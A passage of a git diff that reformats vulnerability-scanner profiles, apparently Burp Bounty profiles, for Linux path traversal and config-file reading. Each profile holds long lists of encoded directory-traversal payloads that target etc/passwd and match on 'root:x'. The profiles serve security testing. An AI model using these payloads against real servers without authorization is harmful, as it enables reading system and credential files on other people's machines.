ILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x"],"Tags":["PathTraversal","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-Path","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[0],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-Path", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,../../{FILE}", + "true,../..//{FILE}", + "true,../..///{FILE}", + "true,../..//../{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,../{FILE}%00.png", + "true,../../{FILE}%00.png", + "true,../../../{FILE}%00.png", + "true,../../../../{FILE}%00.png", + "true,../../../../../{FILE}%00.png", + "true,../../../../../../{FILE}%00.png", + "true,../../../../../../../{FILE}%00.png", + "true,../../../../../../../../{FILE}%00.png", + "true,....//{FILE}", + "true,....//....//{FILE}", + "true,....//....//....//{FILE}", + "true,....//....//....//....//{FILE}", + "true,....//....//....//....//....//{FILE}", + "true,....//....//....//....//....//....//{FILE}", + "true,....//....//....//....//....//....//....//{FILE}", + "true,....//....//....//....//....//....//....//....//{FILE}", + "true,....//....//....//....//....//....//....//....//....//{FILE}", + "true,....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "PathTraversal", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-Path", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/passwd", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 0 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-PathTraversal-MR.bb b/profiles/Linux-PathTraversal-MR.bb old mode 100644 new mode 100755 index 198928d..7a63dc0 --- a/profiles/Linux-PathTraversal-MR.bb +++ b/profiles/Linux-PathTraversal-MR.bb @@ -1 +1,85 @@ -[{"Name":"Linux-PathTraversal-MR","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-PathTraversal-MR", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/../{FILE}", + "true,/../../{FILE}", + "true,/../../../{FILE}", + "true,/../../../../{FILE}", + "true,/../../../../../{FILE}", + "true,/../../../../../../{FILE}", + "true,/../../../../../../../{FILE}", + "true,/../../../../../../../../{FILE}", + "true,/..%2f{FILE}", + "true,/..%2f..%2f{FILE}", + "true,/..%2f..%2f..%2f{FILE}", + "true,/..%2f..%2f..%2f..%2f{FILE}", + "true,/..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-PathTraversal", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/passwd", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 65 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-mysql-conf.bb b/profiles/Linux-mysql-conf.bb index 70c2a39..c7308c7 100755 --- a/profiles/Linux-mysql-conf.bb +++ b/profiles/Linux-mysql-conf.bb @@ -1 +1,950 @@ -[{"Name":"Linux-mysql-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c